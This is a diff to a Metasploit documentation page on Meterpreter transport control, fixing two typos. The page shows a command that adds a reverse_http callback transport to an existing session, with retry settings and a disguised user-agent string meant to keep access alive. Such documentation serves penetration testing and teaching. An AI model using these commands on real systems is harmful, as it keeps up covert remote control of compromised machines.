rapid7/metasploit-framework/Meterpreter-Transport-Control.md

 ### Adding transports

 Adding transports is the hot new thing.
-It gives Meterpeter the ability to work on different transport mechanisms with the goal of keeping the sessions alive for longer.
+It gives Meterpreter the ability to work on different transport mechanisms with the goal of keeping the sessions alive for longer.
 The command for adding new transports varies slightly depending on the transport that is being added.

 The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session.
-It specifies a custom communcations timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:
+It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:

 ```
 meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -rt 50000 -rw 2500 -to 100000 -ua "Totes-Legit Browser/1.1"